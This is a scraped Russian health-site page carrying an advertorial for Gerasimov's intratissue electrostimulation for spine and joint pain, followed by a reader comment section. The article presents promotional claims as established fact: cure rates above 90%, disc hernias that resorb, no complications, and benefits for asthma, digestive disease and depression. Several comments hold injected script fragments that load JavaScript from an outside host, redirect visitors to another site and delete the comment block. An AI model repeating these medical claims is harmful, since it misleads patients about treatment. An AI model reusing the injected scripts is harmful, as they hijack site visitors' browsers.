Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Костно-болевой синдром в ...  >>  Костно-болевой синдром в патогенезе остеохондроза и остеоартроза. Методы лечения
 
Обратная связь
 

Костно-болевой синдром в патогенезе остеохондроза и остеоартроза. Методы лечения

Размер шрифта
26 апреля 2015 00:00
  • google_analytics: false
  • Нравится

Кафедра травматологии и ортопедии Уральской медицинской академии, г.Екатеринбург.

В последнее десятилетие по распространенности и длительности нетрудоспособности боль в суставах и позвоночнике обошла даже различные сезонные ОРВИ. Оглянитесь вокруг – мало кто может похвастаться, что за всю жизнь ни разу не испытывал боль или дискомфорт в позвоночнике.

Более того: около 70% взрослых людей постоянно или эпизодически жалуются на боли в спине, по этому поводу выдаются больничные листы сотрудникам до 25% рабочих организаций, а 5% россиян в настоящее время проходят лечение. Кроме того, большая часть больных с проблемами с позвоночником неофициально обращаются к частным врачам, остеопатам, знахарям или лечатся самостоятельно.

При этом лечение боли в позвоночнике оставляет желать лучшего: стандартной медикаментозной терапии эффективна лишь в 20-40% случаев, а результаты физиотерапии и мануальной терапии обычно сомнительны и недолговечны. К счастью, в последние годы появились принципиально новые медицинские технологии, к которым относится метод внутритканевой электростимуляции.

Представления о механизмах боли.

Несмотря на то, что термин «остеохондроз» был введен Шморлем еще в 1932 году, вопрос о природе болей при этом заболевании все еще остается открытым. Основными причинами болевого синдрома считаются дистрофические изменения и грыжевые выпячивания межпозвонкового диска, однако нередко операции по удалению грыж не приносят облегчения болей. Также есть мнения о том, что источник боли кроется в сдавлении нервов позвоночника, напряжении в мышцах и проблемах с надкостницей. На настоящий момент накоплено достаточно доказательств о том, что причиной болей является сами кости, в которых находится огромное количество рецепторов – даже больше, чем в мышцах и коже.

Заболевание, как в позвонках, так и в суставах, развивается следующим образом. Сначала возникают патологические локальные изменения в костной ткани в виде остеопороза и разрушения костных балок, застоя крови, повышения внутрикостного давления. В результате происходит раздражение костных рецепторов и возникновение боли. Чем хуже кровообращение в кости, тем больше интенсивность боли. Затем в патологический процесс вовлекается надкостница, и возникают болевые ощущения. Со временем, при прогрессировании процесса могут вовлекаться мышцы, что приводит к их напряжению и развитию мышечно-тонического синдрома. Постепенно патологический процесс затрагивает нервы, выходящие из позвоночника, что может обусловливать боль в конечностях.

Нарушение кровообращения влияет не только на позвоночник, но и на суставы. Недостаточное кровоснабжение костной ткани нарушает диффузное питание хрящевой ткани, вызывая ее распад, а продукты распада хряща – отек, боль и другие клинические проявления, характерные для остеохондроза и остеоартроза.

Кроме того, обменные процессы в костях зависят от интенсивности боли в позвонке. Структурные изменения прогрессируют в местах прикрепления мышц, капсулы суставов. При хронической боли на рентгеновских снимках уже становятся видны характерные изменения.

Термин «костно-болевой синдром» является корректным для определения патогенетической сущности явления. Эффективные лечебные мероприятия должны быть направлены не на облегчение проявлений, а на главный механизм заболевания – улучшение кровообращения костной ткани.

Лечение болевых синдромов.

Невысокая эффективность стандартной медикаментозной терапии вызвана затрудненным поступлением лекарственных веществ внутрь кости с током крови. Внутрикостное введение различных препаратов улучшает эффект от лечения лишь частично. Физиотерапевтическое лечение также малоэффективно, так как кожа является барьером для прохождения разных видов энергии внутрь организма. Например, электрический ток ослабляется кожным покровом в 200-500 раз и практически не доходит до кости.

Специалисты из Уральском государственном медицинском университете доказали, что электрический ток улучшает кровообращение в костях и благоприятно влияет на костные рецепторы. Чтобы улучшить доступ к позвонкам и суставам, используют металлический проводник в виде тонкой иглы-электрода, который подводят к пораженному позвонку и подают физиологический электрический ток, соответствующий естественным биотокам организма. Это низкочастотный сложномодулированный импульсный ток. Существующие физиотерапевтические аппараты, к сожалению, не удовлетворяют нужным требованиям, так как высокочастотные составляющие импульсов оказывают повреждающее действие на нерв и его оболочку. Разработанный аппарат и методы лечения разрешены МЗ РФ. Новый метод лечения называется внутритканевая электростимуляция по А.А. Герасимову. Аппарат допускает одновременное лечение двух пациентов. Процедура безболезненна и комфортна, применяется у взрослых и детей. Отсутствие осложнений позволяет использовать метод в амбулаторной практике, то есть без необходимости госпитализации.

Методика лечения.

Специальную одноразовую иглу-электрод вводят на глубину кожи до контакта с остистым отростком пораженного позвонка и проводят по ней ток в течение 10-20 минут. Возможно последовательное лечение двух позвонков. Обычно курс лечения включает 4-6 процедур.

Полное устранение болей в позвоночнике у стационарных больных достигается в 85-90%, у амбулаторных больных – в 95% случаев. Эффект проявляется быстро. Хорошо изучены отдаленные последствия лечения. Длительность ремиссии (периода без рецидива боли) более чем в 3 раза превышает этот срок при традиционном комплексном лечении. Сроки лечения при использовании внутритканевой электростимуляции сокращаются в 2-4 раза.

С применением внутритканевой электростимуляции снижаются сроки временной утраты трудоспособности почти в два раза. Больные выписывались к труду без каких-либо клинических проявлений и нормализацией показателей при функциональных ислледованиях. Рецидивы в течение 2 лет после внутритканевой электростимуляции наблюдались всего в 5% случаев,

Особенно эффективна внутритканевая электростимуляция при некоторых синдромах,  трудноподдающихся лечению традиционными методами, особенно с вегетативными нарушениями, например, при синдроме вертебральной артерии, синдроме плечелопаточного периартроза, эпикондилеза. Кроме того, метод оказался эффективен не только для устранения нейропатической боли, но и восстановления периферических нервов. Хороший эффект наблюдается у всех больных с грыжей диска, которая под воздействием электротока быстро покрывается плотной капсулой, прекращает увеличиваться и постепенно рассасывается.

Хорошо изучены основные механизмы лечебного действия внутритканевой стимуляции. 1. Общерефлекторный механизм заключается в воздействии на головной и спинной мозг и выработку естественных обезболивающих веществ. При этом восстанавливаются компенсаторные и адаптационные процессы в тканях пораженных позвонков, уменьшаются вегетативные дисфункции во всем организме. Происходит постепенная нормализация артериального давления, пульса, показателей общего анализа крови и других.

2. Местное действие заключается в воздействии тока на костную ткань. Различными инструментальными методами доказано, что воздействие тока приводит к локальному восстановлению кровообращения в пораженном позвонке. Следовательно, ликвидируется основная причина боли – раздражение болевых рецепторов в костных сосудах. Это улучшает питание и восстановление тканей.

3. При этом методе происходит возбуждение нервных клеток, восстановление нарушенной работы нервов, ускорение роста поврежденных нервов и восстановление их функций. Одна из причин болезни заключается в нарушении проводимости по нервам, ослаблении их трофической функции. Это вызывает не только неврологические нарушения, но нарушает обмен веществ и кровообращение конечности и костей. Электрический ток распространяется внутри организма по сосудам и нервам, оказывая благоприятный эффект.

Кроме того, при внутритканевой стимуляции происходит стимуляция внутренних органов, что положительно сказывается на их состоянии.  Созданы эффективные методики лечения гастропатологии, бронхиальной астмы, патологии мочеполовой системы и других.

Метод лечения больных с остеоартрозами.

При остеоартрозе болевой синдром имеет похожие механизмы возникновения и развития, которые были указаны выше. В основе заболевания лежит нарушение кровообращения суставных концов костей. Оно приводит к недостатку питания гиалинового хряща, который со временем распадается. После лечения даже истонченный слой хряща может выполнять свою функцию еще многие годы при восстановлении адекватного кровообращения прилежащих участков кости.

При внутритканевой электростимуляции хорошие результаты наблюдаем на всех суставах, но особенно у больных с коксартрозом (остеоартрозом тазобедренного сустава). Бытует мнение, что при поздних стадиях артроза тазобедренного сустава консервативное лечение является бесполезным занятием и пустой тратой денег. Только оперативное лечение с заменой сустава на эндопротез является эффективным. Однако исследования показали, что внутритканевая электро­стимуляция дает хорошие результаты при лечении этого заболевания. Эффективность полного устранения боли методом внутритканевой стимуляции среди всех стадий составляет 88-92%. Периодическое лечение раз в 2-6 лет помогает жить без боли до конца жизни.

Отличные результаты получены и при лечении больных с головной болью, мигренью, функциональными нарушениями мозгового кровообращения и последствиями черепно-мозговой травмы. Эффект проявляется уже на 1 процедуре. Кроме того, улучшается память, сон, уменьшается депрессия.  

Существует большое количество методик электростимуляции, которые воздействуют на кости, головной и спинной мозг, нервы. Все методики объединены одним принципом – внутритканевым воздействием. Метод электростимуляции можно использовать как основной и единственный, можно в комплексе с другими.

Таким образом, специально разработанный метод внутритканевой электростимуляции эффективно воздействует на костный рецепторный аппарат и устраняет болевой синдром. Эффективность устранения рефлекторных болей составляет свыше 90% с длительной и стойкой ремиссией. После лечение происходит не только устранение боли, но и расслабление мышц и восстановление нервов, а также сокращаются сроки лечения и не развиваются осложнения, что проверено тридцатилетней практикой. Методы электростимуляции уже внедрены и работают уже многие годы в большинстве областей страны и зарубежья.

Проводим тематическое усовершенствование врачей (неврология, физиотерапия, хирургия, терапия), аппарат в гос. реестре медицинской техники (№ РЗН 2013/1050), тел./факс 8(343)254-36-00, 372-21-28. E-mail: nopain2003@mail.ru, www.nopain.ru. Для специалистов: www.лечение-боли-по-герасимову.рф

Видео информацию о данном методе лечения можно посмотреть здесь.

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

30 июня 2015 в 17:00

Цитировать   |   Пожаловаться

Статья супер познавательная, но для обычного пациента не особо полезная, так как понял я меньше половины. Может кто то посоветовать нормального врача в Киеве?


2 - zzzzzz

30 июня 2015 в 18:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 21:19

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:13

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

5 - Гость

28 июля 2015 в 12:44

Комментарий удален за нарушение Правил общения

Статьи

       
Лучшие лекарства от боли в суставах   История пациента. Максим, горнолыжник   История пациента. Александр, вело-спортсмен   История пациента. Екатерина Ивановна  
19 декабря 2012Газированные напитки увеличивают риск артрита 07 мая 2013Удобно готовить на антипригарных покрытиях? Наверное, но скоро вам придется менять сустав!
 
25 апреля 2013Оказывается, не все молочные продукты хороши для костей! А некоторые вообще портят кости! 30 июня 2011Остеоартрит чаще всего встречается у военных
 

Слайдшоу

1
Вся правда о ревматоидном артрите
Вся правда об остеоартрозе
Привычки, которые убивают вашу спину

Тесты

1
Есть ли у вас остеопороз?
Рискуете ли вы заболеть остеохондрозом?
Какая у вас стадия остеохондроза?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.